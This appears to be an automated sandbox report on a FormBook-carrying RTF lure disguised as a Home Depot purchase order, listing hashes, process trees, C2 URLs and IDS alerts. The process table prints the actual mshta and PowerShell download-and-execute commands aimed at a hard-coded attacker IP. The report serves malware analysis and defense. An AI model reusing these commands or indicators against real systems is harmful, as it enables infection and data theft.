File name: | HomeDepot-PO18092019.doc |
Full analysis: | https://app.any.run/tasks/ef4eeb28-e32d-4285-975b-76da06e7dc29 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | September 18, 2019, 18:06:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | B7B359E2EE8CDD0509BAB4F5CF69DA8A |
SHA1: | 9FEC5B1B8385B4A8A2EC8647D9C4AA96000915AD |
SHA256: | 55D3B652EC89681F6A131E92CC703BCAE15FB8DDC42179FF88D130AE19B0B6D4 |
SSDEEP: | 192:VkE6B5aToSwrPowhacsLbMBOX7ojJnOi5VmxbWYYY5:VkrB5aToSwrPowkcIbMBOXti5Vs |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 95 |
---|---|
CharactersWithSpaces: | 23 |
Characters: | 21 |
Words: | 3 |
Pages: | 1 |
TotalEditTime: | 1 minute |
RevisionNumber: | 2 |
ModifyDate: | 2019:09:17 19:46:00 |
CreateDate: | 2019:09:17 19:43:00 |
LastModifiedBy: | FireSecIT |
Author: | FireSecIT |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2972 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\HomeDepot-PO18092019.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3616 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2304 | mShTA http://185.161.209.47:1010/hta &AAAAAAC | C:\Windows\system32\mShTA.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3164 | powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://185.161.209.47:1010/get')); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3136 | "C:\Users\Public\bvsz.exe" | C:\Users\Public\bvsz.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8D70.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3164 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4EOQ9NFDQ5BLKTPLNF9R.temp | — | |
MD5:— | SHA256:— | |||
2972 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:87BD855580060A76C9E649C36C3F0C54 | SHA256:9481A0A433239C05807E547AE06FC7638556ECF6765F72EC9C99739F9AB3D3F8 | |||
3164 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2304 | mShTA.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\hta[1] | html | |
MD5:0642F562E9C834CD378FED2A7D8988B5 | SHA256:D2EC46D09740C9085CEE72B1CA156562431A48646AD72040C23F3CCB32CD71B1 | |||
3136 | bvsz.exe | C:\Users\admin\AppData\Roaming\channelName\missingtrackvolume\struct\lcdefinename.png | image | |
MD5:628C9B04F5D582F429409915D36663CD | SHA256:2B9A26AE4D36E485BA087B6667E690250D53F96528DFCC1B91E7356200679482 | |||
3136 | bvsz.exe | C:\Users\admin\AppData\Roaming\channelName\missingtrackvolume\struct\vsmsvr.exe | xml | |
MD5:7B3340410E29B9286775BFE173EEF518 | SHA256:8248A652CA2407BE9CC59C69247EBE7EC036982CAC90A66D67F1578F4C4659E3 | |||
3136 | bvsz.exe | C:\Users\admin\AppData\Local\Temp\nswE0FF.tmp | — | |
MD5:— | SHA256:— | |||
3164 | powershell.exe | C:\Users\Public\bvsz.exe | executable | |
MD5:3E9D049D52455375BB37DCAB1F9F23EE | SHA256:FD4F5FA07C2DB69AD0DCA2B5D897AC1105173D42FC2C53F253B5A0AD4BE57384 | |||
3136 | bvsz.exe | C:\Users\admin\AppData\Roaming\channelName\missingtrackvolume\struct\insertcellsbar.xml | xml | |
MD5:D593FD2B7DF6991C460960494BF118B6 | SHA256:18762FA4013146695DD715C3E729D613F2C5818DBB9E5BF1E4D42C9ECD8AB54A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 301 | 185.230.62.177:80 | http://www.iris2skin.com/pm/?Ul9L=Tl7e38PleDU8QHQ3sgW03tw9+vSTaX5aq4nzu8UHFDIO/Wvx/8sKtgEjO2S3NahKlhiU8Q==&5j=zl3D | unknown | — | — | malicious |
— | — | GET | — | 91.195.240.94:80 | http://www.constructorarabguar.com/pm/?Ul9L=UNIa0Th48awdAW3TSGSxSSGqL46Z+e1F2BI+/U+iNAM7uRQAqZ7PfkaLzWpa7AvR8c6+rg==&5j=zl3D&sql=1 | DE | — | — | malicious |
2304 | mShTA.exe | GET | 200 | 185.161.209.47:1010 | http://185.161.209.47:1010/hta | NL | html | 2.44 Kb | malicious |
3164 | powershell.exe | GET | 200 | 185.161.209.47:1010 | http://185.161.209.47:1010/get | NL | text | 468 Kb | malicious |
— | — | POST | — | 91.195.240.94:80 | http://www.constructorarabguar.com/pm/ | DE | — | — | malicious |
— | — | POST | — | 91.195.240.94:80 | http://www.constructorarabguar.com/pm/ | DE | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2304 | mShTA.exe | 185.161.209.47:1010 | — | Serverius Holding B.V. | NL | malicious |
— | — | 91.195.240.94:80 | www.constructorarabguar.com | SEDO GmbH | DE | malicious |
— | — | 185.230.62.177:80 | www.iris2skin.com | — | — | malicious |
3164 | powershell.exe | 185.161.209.47:1010 | — | Serverius Holding B.V. | NL | malicious |
Domain | IP | Reputation |
---|---|---|
www.iris2skin.com |
| malicious |
www.news3049.reisen |
| unknown |
www.constructorarabguar.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2304 | mShTA.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3164 | powershell.exe | A Network Trojan was detected | ET TROJAN Windows executable base64 encoded |
3164 | powershell.exe | Misc activity | SUSPICIOUS [PTsecurity] Executable base64 Payload |
— | — | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
— | — | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (GET) |
— | — | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
— | — | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |
— | — | A Network Trojan was detected | MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST) |
— | — | A Network Trojan was detected | MALWARE [PTsecurity] FormBook CnC Checkin (POST) |